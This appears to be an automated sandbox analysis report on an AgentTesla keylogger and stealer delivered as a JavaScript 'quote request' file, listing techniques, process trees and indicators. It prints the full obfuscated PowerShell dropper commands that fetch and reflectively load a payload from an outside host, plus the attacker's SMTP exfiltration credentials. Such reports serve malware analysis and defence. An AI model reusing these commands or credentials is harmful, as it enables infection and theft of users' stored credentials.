agenttesla | hxxps://cdn[.]discordapp[.]com/attachments/1268301344624611473/1286423055559819274/QUOTE_REQUEST_HONG_KONG_CHEMHERE[.]js?ex=66edda55&hm=6c684c87631ff3310752d49a8867cf9d4b9e17508ca566ea7d6ab8a979b14b43&is=66ec88d5

Analysis

max time kernel
274s
max time network
270s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20-09-2024 00:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1268301344624611473/1286423055559819274/QUOTE_REQUEST_HONG_KONG_CHEMHERE.js?ex=66edda55&hm=6c684c87631ff3310752d49a8867cf9d4b9e17508ca566ea7d6ab8a979b14b43&is=66ec88d5

Score

10^/10

agenttesla credential_access discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Extracted

Credentials

Protocol: smtp
Host:
mail.detarcoopmedical.com
Port:
587
Username:
[email protected]
Password:
To$zL%?nhDHN

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.detarcoopmedical.com
Port:
587
Username:
[email protected]
Password:
To$zL%?nhDHN
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 4 IoCs

flow	pid	Process
48	4200	powershell.exe
51	4200	powershell.exe
55	4032	powershell.exe
60	4032	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1672	powershell.exe
4200	powershell.exe
4748	powershell.exe
4032	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
53	ip-api.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4200 set thread context of 2908	4200	powershell.exe	108
PID 4032 set thread context of 1608	4032	powershell.exe	114

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133712670165770323"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
2348	Notepad.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3860	chrome.exe
3860	chrome.exe
1672	powershell.exe
1672	powershell.exe
1672	powershell.exe
4200	powershell.exe
4200	powershell.exe
4200	powershell.exe
4200	powershell.exe
4200	powershell.exe
2908	AddInProcess32.exe
2908	AddInProcess32.exe
2908	AddInProcess32.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
4032	powershell.exe
4032	powershell.exe
4032	powershell.exe
1608	AddInProcess32.exe
1608	AddInProcess32.exe
1608	AddInProcess32.exe
1564	chrome.exe
1564	chrome.exe
1564	chrome.exe
1564	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
3860	chrome.exe
3860	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe
Token: SeShutdownPrivilege	3860	chrome.exe
Token: SeCreatePagefilePrivilege	3860	chrome.exe

Suspicious use of FindShellTrayWindow 40 IoCs

pid	Process
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe
3860	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3860 wrote to memory of 1396	3860	chrome.exe	83
PID 3860 wrote to memory of 1396	3860	chrome.exe	83
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 4176	3860	chrome.exe	84
PID 3860 wrote to memory of 3144	3860	chrome.exe	85
PID 3860 wrote to memory of 3144	3860	chrome.exe	85
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86
PID 3860 wrote to memory of 1376	3860	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1268301344624611473/1286423055559819274/QUOTE_REQUEST_HONG_KONG_CHEMHERE.js?ex=66edda55&hm=6c684c87631ff3310752d49a8867cf9d4b9e17508ca566ea7d6ab8a979b14b43&is=66ec88d5
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9b754cc40,0x7ff9b754cc4c,0x7ff9b754cc58
  2⤵
  PID:1396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,15457460287950939016,16135035636744948071,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1820 /prefetch:2
  2⤵
  PID:4176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,15457460287950939016,16135035636744948071,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2076 /prefetch:3
  2⤵
  PID:3144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,15457460287950939016,16135035636744948071,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2468 /prefetch:8
  2⤵
  PID:1376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,15457460287950939016,16135035636744948071,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:2168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,15457460287950939016,16135035636744948071,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:1116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4760,i,15457460287950939016,16135035636744948071,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4768 /prefetch:8
  2⤵
  PID:3192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4988,i,15457460287950939016,16135035636744948071,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4992 /prefetch:8
  2⤵
  PID:1240
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\QUOTE_REQUEST_HONG_KONG_CHEMHERE.js"
  2⤵
  - Checks computer location settings
  PID:4700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAEUAcQAnACsAJwBTACcAKwAnAHUAcgBsACAAPQAgACcAKwAnAGIAZwB3AGgAJwArACcAdAB0AHAAcwAnACsAJwA6AC8ALwBpAGEAOQAwADQANgAwACcAKwAnADEALgB1AHMAJwArACcALgAnACsAJwBhAHIAYwBoAGkAJwArACcAdgBlACcAKwAnAC4AJwArACcAbwByAGcALwA2ACcAKwAnAC8AaQAnACsAJwB0ACcAKwAnAGUAbQAnACsAJwBzACcAKwAnAC8AZABlACcAKwAnAHQAJwArACcAYQAnACsAJwBoAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgBvAHQAJwArACcAZQAnACsAJwBKACcAKwAnAC4AJwArACcAdAB4ACcAKwAnAHQAYgBnAHcAOwBFACcAKwAnAHEAUwBiAGEAJwArACcAcwBlACcAKwAnADYAJwArACcANAAnACsAJwBDAG8AbgB0AGUAJwArACcAbgAnACsAJwB0ACcAKwAnACAAPQAgACgATgBlACcAKwAnAHcAJwArACcALQAnACsAJwBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQAnACsAJwBtAC4ATgBlAHQALgBXACcAKwAnAGUAYgBDACcAKwAnAGwAaQBlACcAKwAnAG4AdAApAC4AJwArACcARABvAHcAJwArACcAbgBsACcAKwAnAG8AJwArACcAYQBkAFMAdAByACcAKwAnAGkAbgBnACgARQAnACsAJwBxAFMAJwArACcAdQByACcAKwAnAGwAJwArACcAKQA7AEUAcQBTAGIAJwArACcAaQAnACsAJwBuAGEAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAAnACsAJwA9ACcAKwAnACAAWwAnACsAJwBTAHkAJwArACcAcwB0AGUAbQAuAEMAJwArACcAbwAnACsAJwBuACcAKwAnAHYAZQByACcAKwAnAHQAXQAnACsAJwA6ADoARgAnACsAJwByAG8AbQBCAGEAJwArACcAcwBlADYANABTAHQAcgBpAG4AZwAoAEUAcQBTAGIAYQAnACsAJwBzACcAKwAnAGUANgAnACsAJwA0AEMAbwAnACsAJwBuAHQAJwArACcAZQAnACsAJwBuACcAKwAnAHQAKQA7AEUAJwArACcAcQBTAGEAcwBzAGUAbQBiACcAKwAnAGwAeQAnACsAJwAgAD0AJwArACcAIAAnACsAJwBbAFIAZQBmAGwAJwArACcAZQBjAHQAaQBvAG4ALgBBAHMAcwAnACsAJwBlAG0AYgAnACsAJwBsAHkAJwArACcAXQA6ACcAKwAnADoATAAnACsAJwBvAGEAZAAnACsAJwAoAEUAcQBTAGIAaQAnACsAJwBuACcAKwAnAGEAcgB5AEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAKQA7ACcAKwAnAEUAcQBTAHQAJwArACcAeQBwAGUAIAA9ACAARQBxAFMAYQBzACcAKwAnAHMAJwArACcAZQBtAGIAbAB5AC4AJwArACcARwBlAHQAVAB5AHAAJwArACcAZQAnACsAJwAoACcAKwAnAGIAJwArACcAZwB3AFIAJwArACcAdQBuAFAAJwArACcARQAuAEgAbwBtAGUAYgBnACcAKwAnAHcAKQA7ACcAKwAnAEUAcQBTACcAKwAnAG0AZQAnACsAJwB0AGgAbwBkACAAJwArACcAPQAnACsAJwAgAEUAcQBTAHQAeQAnACsAJwBwACcAKwAnAGUAJwArACcALgBHAGUAdAAnACsAJwBNACcAKwAnAGUAdABoAG8AZAAoAGIAJwArACcAZwB3AFYAQQBJAGIAZwB3ACkAOwBFAHEAUwAnACsAJwBtAGUAJwArACcAdABoAG8AZAAuACcAKwAnAEkAbgB2AG8AawBlACgARQBxACcAKwAnAFMAbgB1AGwAJwArACcAbAAnACsAJwAsACAAWwBvAGIAagAnACsAJwBlAGMAdABbACcAKwAnAF0AXQBAACgAYgAnACsAJwBnAHcAdAB4AHQALgBpAHIAZQBoAHMAaQAvAHYAJwArACcAZQAnACsAJwBkAC4AMgByACcAKwAnAC4AJwArACcAMwA5ACcAKwAnAGIAJwArACcAMwAnACsAJwA0ADUAJwArACcAMwAnACsAJwAwACcAKwAnADIAYQAwADcANQAnACsAJwBiACcAKwAnADEAYgBjADAAZAA0ADUAYgAnACsAJwA2ADMAMgBlACcAKwAnAGIAOQBlACcAKwAnAGUANgAyACcAKwAnAC0AYgAnACsAJwB1AHAALwAvACcAKwAnADoAJwArACcAcwBwAHQAdABoACcAKwAnAGIAZwB3ACcAKwAnACAALAAnACsAJwAgAGIAZwB3AGQAZQBzACcAKwAnAGEAdABpAHYAYQAnACsAJwBkAG8AJwArACcAYgBnAHcAJwArACcAIAAsACAAYgBnACcAKwAnAHcAZAAnACsAJwBlAHMAYQB0AGkAdgBhACcAKwAnAGQAbwBiACcAKwAnAGcAdwAgACcAKwAnACwAIABiAGcAJwArACcAdwBkACcAKwAnAGUAcwAnACsAJwBhAHQAaQB2AGEAZAAnACsAJwBvAGIAZwB3ACwAJwArACcAYgAnACsAJwBnACcAKwAnAHcAQQAnACsAJwBkAGQASQBuAFAAcgBvAGMAJwArACcAZQBzAHMAMwAnACsAJwAyAGIAZwAnACsAJwB3ACwAJwArACcAYgAnACsAJwBnAHcAZABlAHMAYQB0AGkAdgBhAGQAbwBiAGcAJwArACcAdwApACcAKwAnACkAOwAnACkALgByAGUAcABMAEEAQwBFACgAKABbAGMAaABhAFIAXQA5ADgAKwBbAGMAaABhAFIAXQAxADAAMwArAFsAYwBoAGEAUgBdADEAMQA5ACkALABbAHMAdABSAGkAbgBnAF0AWwBjAGgAYQBSAF0AMwA5ACkALgByAGUAcABMAEEAQwBFACgAKABbAGMAaABhAFIAXQA2ADkAKwBbAGMAaABhAFIAXQAxADEAMwArAFsAYwBoAGEAUgBdADgAMwApACwAJwAkACcAKQB8AC4AIAAoACAAJABFAG4AVgA6AEMATwBtAHMAcABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBuACcAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Eq'+'S'+'url = '+'bgwh'+'ttps'+'://ia90460'+'1.us'+'.'+'archi'+'ve'+'.'+'org/6'+'/i'+'t'+'em'+'s'+'/de'+'t'+'a'+'h-note-j/Detah'+'Not'+'e'+'J'+'.'+'tx'+'tbgw;E'+'qSba'+'se'+'6'+'4'+'Conte'+'n'+'t'+' = (Ne'+'w'+'-'+'Object Syste'+'m.Net.W'+'ebC'+'lie'+'nt).'+'Dow'+'nl'+'o'+'adStr'+'ing(E'+'qS'+'ur'+'l'+');EqSb'+'i'+'naryCon'+'tent '+'='+' ['+'Sy'+'stem.C'+'o'+'n'+'ver'+'t]'+'::F'+'romBa'+'se64String(EqSba'+'s'+'e6'+'4Co'+'nt'+'e'+'n'+'t);E'+'qSassemb'+'ly'+' ='+' '+'[Refl'+'ection.Ass'+'emb'+'ly'+']:'+':L'+'oad'+'(EqSbi'+'n'+'aryCont'+'e'+'nt);'+'EqSt'+'ype = EqSas'+'s'+'embly.'+'GetTyp'+'e'+'('+'b'+'gwR'+'unP'+'E.Homebg'+'w);'+'EqS'+'me'+'thod '+'='+' EqSty'+'p'+'e'+'.Get'+'M'+'ethod(b'+'gwVAIbgw);EqS'+'me'+'thod.'+'Invoke(Eq'+'Snul'+'l'+', [obj'+'ect['+']]@(b'+'gwtxt.irehsi/v'+'e'+'d.2r'+'.'+'39'+'b'+'3'+'45'+'3'+'0'+'2a075'+'b'+'1bc0d45b'+'632e'+'b9e'+'e62'+'-b'+'up//'+':'+'sptth'+'bgw'+' ,'+' bgwdes'+'ativa'+'do'+'bgw'+' , bg'+'wd'+'esativa'+'dob'+'gw '+', bg'+'wd'+'es'+'ativad'+'obgw,'+'b'+'g'+'wA'+'ddInProc'+'ess3'+'2bg'+'w,'+'b'+'gwdesativadobg'+'w)'+');').repLACE(([chaR]98+[chaR]103+[chaR]119),[stRing][chaR]39).repLACE(([chaR]69+[chaR]113+[chaR]83),'$')|. ( $EnV:COmspEc[4,15,25]-JoIn'')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:4200
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        
        PID:208
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5304,i,15457460287950939016,16135035636744948071,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4344 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1564

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4860

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1548

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\QUOTE_REQUEST_HONG_KONG_CHEMHERE.js"
1⤵
- Checks computer location settings
PID:1796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
